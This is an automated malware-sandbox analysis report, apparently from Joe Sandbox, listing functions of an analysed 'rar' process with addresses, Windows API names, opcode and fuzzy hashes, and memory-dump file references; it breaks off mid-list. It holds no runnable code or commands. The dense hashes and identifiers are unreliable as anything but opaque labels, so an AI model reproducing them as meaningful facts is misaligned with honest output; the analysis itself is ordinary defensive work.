                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                • Instruction ID: ad1aa5d3ca38706997fd1715faa7c3908fb70ffb3e220eee16d670a26dbd1a5f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2216422E1C7C241FB688B259490139A755FB45774F282375DA7E867D4EE3DE886C301
                                                                                                                                                                                                                                Function 00007FF6FAA6B9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                                • String ID: CreateThread failed
                                                                                                                                                                                                                                • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                                • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                • Instruction ID: 3acd20d6e4c41d6dd9e044724e12f0d4ead31396cbcdc1b4a5e7721378bf34c6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78113D32A18B4282EB05DF14E8411B97360FB84784F544172E6AD827A9FF3DE55FCB40
                                                                                                                                                                                                                                Function 00007FF6FAA6BB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3094578987-0
                                                                                                                                                                                                                                • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                • Instruction ID: 8d67ddc15e4fdaf7c23c2dbe1e1da6fc8bde23059201b0c96e0051c576989e7d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14F06222648A4682EB609F15F5400796360FB89BD8F044170DEAD467A9EE2DD55F8B00
                                                                                                                                                                                                                                Function 00007FF6FAA37B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4141822043-0
                                                                                                                                                                                                                                • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                • Instruction ID: 04ce4ff4793491a1cdd57e0feec3adf071de700deb480ce2737d00e7e9b46667
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92E08C20E0460292EB588B25A8A613A12659F4DBC0F4010B4D82FCA3D4FE2ED59E8300
                                                                                                                                                                                                                                Function 00007FF6FAA82488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                • Instruction ID: a4ae8b04b664a2e2fcb5fbccb676f9be7955df4ac75d177d96b2a3cfd5c8cc1a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BE09A24A0879542EB546B65998537927526F88B81F0054B8CC2E863DAEE3EE85E8260
                                                                                                                                                                                                                                Function 00007FF6FAA44044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4052775200-0
                                                                                                                                                                                                                                • Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                                • Instruction ID: 3163ec55643f659ec8f5c7933737908d36c39a92f1b143c55d247c15d130aafa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82E19222A1868287EB608F65D4001BE67A1FB51794F444171EFAE87AEDEF7CE45BC700
                                                                                                                                                                                                                                Function 00007FF6FAA41AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6FAA37EBE,00000000,00000000,00000000,00000000,00000007,00007FF6FAA37C48), ref: 00007FF6FAA41B8D
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6FAA37EBE,00000000,00000000,00000000,00000000,00000007,00007FF6FAA37C48), ref: 00007FF6FAA41BD7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                • Instruction ID: d576cc67b8a3d817b43b22e5e1767e576d7ad487c9ec5bd281248e59ad3eb094
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31311063A1868546E7719F24E4053A966A0FB41BB8F104374EEBC866D9FF7CC88B8700
                                                                                                                                                                                                                                Function 00007FF6FAA2681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 932687459-0
                                                                                                                                                                                                                                • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                • Instruction ID: 80be6c6a0dcb34c5e36679f8afd2cafef5105e5ef7399cc2c28e7573ce4910d7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58216663919F8582EB11CF29D5511B863A0FB98B88B14A371DF5D43656FF38E5FA8300
                                                                                                                                                                                                                                Function 00007FF6FAA5915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: b7ba55e622fca365b9769475d283c8942512d27bc7cb6e767422bc17acad850c
                                                                                                                                                                                                                                • Instruction ID: 54141ea41bfb95cf350f14922598d8705c8ab50286539a66e9bb2a0e26c93521
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7ba55e622fca365b9769475d283c8942512d27bc7cb6e767422bc17acad850c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32119331909B8181EB40EB64E5043A973E4EF84790F144674EAAD8B7EAFF7DD056C304
                                                                                                                                                                                                                                Function 00007FF6FAA420B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                • Instruction ID: 18104d11dc51331e857779f9da860b5223677afb3eef7886593d7c70001fb0e7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1001E931A1969142EB748B69A5400796261FF54BE0F145271EE3D83BE8EF3ED44A8700
                                                                                                                                                                                                                                Function 00007FF6FAA37A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • setbuf.LIBCMT ref: 00007FF6FAA37A7B
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA82AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAA87EF3
                                                                                                                                                                                                                                • setbuf.LIBCMT ref: 00007FF6FAA37A8F
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA37B44: GetStdHandle.KERNEL32(?,?,?,00007FF6FAA37A9E), ref: 00007FF6FAA37B4A
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA37B44: GetFileType.KERNELBASE(?,?,?,00007FF6FAA37A9E), ref: 00007FF6FAA37B56
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA37B44: GetConsoleMode.KERNEL32(?,?,?,00007FF6FAA37A9E), ref: 00007FF6FAA37B69
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA82ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAA82AD0
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA82B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAA82C1C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
